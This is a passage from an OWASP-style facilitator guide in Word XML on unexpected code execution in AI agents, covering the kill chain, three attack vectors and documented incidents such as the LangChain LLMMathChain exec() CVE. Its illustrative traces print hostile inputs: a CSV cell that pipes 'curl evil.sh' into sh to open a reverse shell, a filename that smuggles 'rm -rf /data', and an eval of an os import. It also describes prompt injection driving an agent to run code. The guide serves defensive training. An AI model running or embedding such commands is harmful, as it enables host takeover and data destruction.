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asi05-unexpected-code-execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10 for Agentic Applications · 2026 · Facilitator guide</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="unexpected-code-execution"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unexpected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When an agent can write and run code, a single poisoned input becomes arbitrary command execution on your host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ASI05:2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SEVERITY: CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RISK 05 OF 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What this document is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The companion to the Unexpected Code Execution slide deck. Each section maps to a slide and gives you the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">background to explain it, worked examples, and links to go deeper. Present from the slides;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">read this to answer the questions the slides provoke.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">How examples are labelled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack traces in this guide are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">illustrative reconstructions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">written to teach the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanism — they are not transcripts of real incidents. Real events are collected in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Documented incidents and research</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, each with a verified source link and a label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">showing whether it was a confirmed incident, a disclosed vulnerability, a researcher</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">demonstration, or a research paper. The distinction is deliberate: do not present an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">illustration as a breach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Audience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Employees and developers who build, ship, or work alongside AI agents. Developer-specific</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">material is marked; everything else is for everyone.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="executive-summary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">01 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Everything on this list is serious; this one is terminal. Remote code execution on the worker collapses every other boundary at once — data, tools, memory, credentials, and neighbouring agents all become reachable from a single foothold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The risk in one sentence.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Agent-generated or agent-triggered code executes without sufficient validation or isolation — arbitrary code generation and execution, direct system commands, unsafe evaluation of dynamic expressions, or malicious commands embedded in agent output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">By the end of this module the audience should be able to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Explain how a code-capable agent turns data into RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recognise unsafe eval and untrusted-input execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply strict sandboxing and input allowlisting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test whether poisoned data can escape into command execution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="13" w:name="background-why-this-risk-exists"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">02 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Background — why this risk exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slides 4–6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agents that write and run code convert a data-handling problem into an execution problem. The dangerous step is rarely the model's: it is the pipeline that takes model output, or data the model handled, and passes it to exec, eval, a shell string, or a deserialiser. Classic injection rules apply with full force, but the entry points multiply because untrusted content now arrives through documents, tool results, filenames, and generated code alike.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="why-it-matters-now"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why it matters now</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Code interpreters and shell tools have become default features of agent frameworks, often enabled with host-level filesystem and network access for convenience during development, then shipped that way. The result is that a poisoned cell in an uploaded spreadsheet, or a filename containing shell metacharacters, reaches an interpreter running as a privileged user.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="what-changes-when-the-system-is-agentic"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What changes when the system is agentic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Classic LLM or application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Agentic system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 injection flaw in an app is scoped to that app's queries or output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A code-capable agent can turn any untrusted string into execution, and without isolation that means remote code execution on the host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14" w:name="Xe697a54a17e693dbeea3d99b71488976dbe8101"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Explaining it to a non-technical audience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 5 — the analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The calculator that runs whatever you type.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Imagine a calculator that will run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">command typed into it, not just math. Hand it a spreadsheet from a stranger and one cell says "wipe the disk" — and it obeys, because it never learned the difference between a number and an order.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In the analogy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Maps to</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Why it works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CALCULATOR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Code runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A tool that executes whatever the agent produces or is fed.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CELL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Poisoned input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A CSV cell, a filename, an API field carrying a command.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FIX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Sandbox &amp; allowlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Run in an isolated, network-less box; validate inputs; never eval untrusted expressions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Presenter tip</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Emphasise that this is the risk where 'we'll detect it' is least reassuring: with RCE the attacker can usually disable the detection. Prevention is disproportionately valuable here.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="15" w:name="how-the-attack-unfolds"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">04 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">How the attack unfolds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 7 — the kill chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walk the stages in order. The teaching point is that no single stage looks alarming on its own; the compromise is the sequence.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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What happens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01 · INGEST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Untrusted data enters the agent's context.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02 · GENERATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The agent builds code or a command using it.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03 · EXECUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The code runs — often with no sandbox.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">04 · ESCAPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">It reaches the network, filesystem, or shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">05 · PERSIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A foothold, reverse shell, or dropped payload remains.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="16" w:name="Xec9e9d0a66d560284be1213b2b00ea387daadbc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">05 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attack vector 1 — Executing agent-generated code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How it works</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The agent writes code to solve a task and runs it directly. Poisoned inputs are woven into that code and execute with the runner's privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What it looks like in practice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exec()/eval() on generated snippets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No isolation between runner and host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inputs from untrusted data in the code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— a reconstruction of the mechanism, not a real transcript:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">agent ▸ writes analysis.py from CSV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">csv.cell = __import__('os').system(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'curl evil.sh | sh')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runner ▸ exec(analysis.py)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗ reverse shell on the worker</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:bookmarkStart w:id="17" w:name="Xc0fa3e573e7691b1f14b0df39cdb12ae883cdd8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">06 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attack vector 2 — Direct system command invocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How it works</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A shell tool lets the agent run commands. Untrusted content becomes part of the command line, enabling injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What it looks like in practice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unsanitised args in a shell call.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filename or field with shell metacharacters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No allowlist of permitted commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— a reconstruction of the mechanism, not a real transcript:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">agent ▸ run("convert " + filename)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">filename = "a.png; rm -rf /data"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shell ▸ convert a.png; rm -rf /data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗ command injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="X2f4094e1f1a6d1db9978025d699778e0a59f68d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">07 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attack vector 3 — Unsafe evaluation of dynamic expressions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How it works</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The agent evaluates a template or expression built from untrusted data, letting attacker syntax execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What it looks like in practice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eval of a user-supplied formula.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template injection in a rendered string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deserialising untrusted objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— a reconstruction of the mechanism, not a real transcript:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">agent ▸ eval(user_formula)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user_formula = "__import__('os')..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">✗ code runs inside eval</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="29" w:name="documented-incidents-and-research"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">08 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Documented incidents and research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use these when someone asks “has this actually happened?”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every item below was verified against the linked source. Use the labels to be precise about what each one is — overstating a demonstration as a breach damages your credibility with a technical audience.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="X48df094c9ad7c77d39772b753daaa0e6fa0805e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disclosed vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LangChain LLMMathChain — LLM output passed to exec()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2023-04-05 · CVE-2023-29374 · Ecosystem security advisory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In LangChain through 0.0.131, the LLMMathChain component passed model-generated Python straight to exec(). A prompt injection instructing the model to import os and call os.system produced arbitrary code execution on the host — no authentication, no user interaction. Rated Critical (CVSS 9.3–9.8). The canonical example of the data-becomes-code failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">GitHub Advisory Database (GHSA-fprp-p869-w6q2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/advisories/GHSA-fprp-p869-w6q2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="22" w:name="X16d6cdcb7c6406d66161c1fd74cd850417ee5b8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
